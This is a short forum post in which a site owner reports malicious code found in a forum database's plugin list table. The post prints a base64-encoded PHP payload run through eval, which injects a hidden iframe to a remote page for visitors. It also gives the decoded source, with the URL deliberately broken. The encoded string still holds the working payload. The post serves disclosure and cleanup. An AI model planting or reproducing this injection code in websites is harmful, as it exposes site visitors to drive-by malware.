new 0 day exploit? (bekebu.in / cuzelu.in)

[SomeDude-GP]

I finally found the offending code. It is in the datastore/pluginlist table. It's a base64 encoded string.

Code:

\r\n@eval(base64_decode(\"aWYgKCFpc3NldCgkX0NPT0tJRVsneGxvdiddKSkgew0KJHhiID0gYXJyYXkoJ01TSUUnLCdNeUlFJywnSUUnLCdGaXJlZm94JywnT3BlcmEnLCdOZXRzY2FwZScsJ0Nocm9tZScsJ1NhZmFyaScsJ01lZGlhIENlbnRlcicpOw0KJGlmcmFuZCA9IG10X3JhbmQoMCwxMTEpOw0KJGRvbWIgPSAiaHR0cDovL3d3dy5mZWFsYXRvYy5jby5jYy9jbG8ucGhwIjsNCmZvcmVhY2ggKCR4YiBhcyAkeGJiKSB7DQppZihzdHJzdHIoc3RydG9sb3dlcigkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pLHN0cnRvbG93ZXIoJHhiYikpKSB7DQplY2hvIDw8PEhKSg0KPHNjcmlwdD4NCmZ1bmN0aW9uIFNldENvb2tpZShjb29raWVOYW1lLGNvb2tpZUNvbnRlbnQpew0KIHZhciBjb29raWVQYXRoID0gJy8nOw0KIHZhciBleHBEYXRlPW5ldyBEYXRlKCk7DQogZXhwRGF0ZS5zZXRUaW1lKGV4cERhdGUuZ2V0VGltZSgpKzM3MjgwMDAwMCkgIDsNCiB2YXIgZXhwaXJlcz1leHBEYXRlLnRvR01UU3RyaW5nKCk7DQogZG9jdW1lbnQuY29va2llPWNvb2tpZU5hbWUrIj0iK2VzY2FwZShjb29raWVDb250ZW50KSsiO3BhdGg9Iitlc2NhcGUoY29va2llUGF0aCkrIjtleHBpcmVzPSIrZXhwaXJlczsgDQp9DQpTZXRDb29raWUoInhsb3YiLCAiZGF5Iik7DQo8L3NjcmlwdD4NCjxpZnJhbWUgbmFtZT0iJGlmcmFuZCIgd2lkdGg9IjEiIGhlaWdodD0iMSIgc2Nyb2xsaW5nPSJubyIgZnJhbWVib3JkZXI9Im5vIiBtYXJnaW53aWR0aD0iMCIgbWFyZ2luaGVpZ2h0PSIwIiBzcmM9IiRkb21iIj48L2lmcmFtZT4NCkhKSjsNCmJyZWFrOw0KIH0NCiB9DQp9\"));

which resulted in

Code:

if (!isset($_COOKIE['xlov'])) {
$xb = array('MSIE','MyIE','IE','Firefox','Opera','Netscape','Chrome','Safari','Media Center');
$ifrand = mt_rand(0,111);
$domb = "http: // www. fealatoc.co .cc/clo.php";
foreach ($xb as $xbb) {
if(strstr(strtolower($_SERVER['HTTP_USER_AGENT']),strtolower($xbb))) {
echo <<<HJJ
<script>
function SetCookie(cookieName,cookieContent){
 var cookiePath = '/';
 var expDate=new Date();
 expDate.setTime(expDate.getTime()+372800000)  ;
 var expires=expDate.toGMTString();
 document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires; 
}
SetCookie("xlov", "day");
</script>
<iframe name="$ifrand" width="1" height="1" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="$domb"></iframe>
HJJ;
break;
 }
 }
}

--------------- Added [DATE]1277566093[/DATE] at [TIME]1277566093[/TIME] ---------------

the url in the script code is broken on purpose

--------------- Added [DATE]1277566152[/DATE] at [TIME]1277566152[/TIME] ---------------

Thanks to the people over at Tapatalk for helping me figure this out. :wink: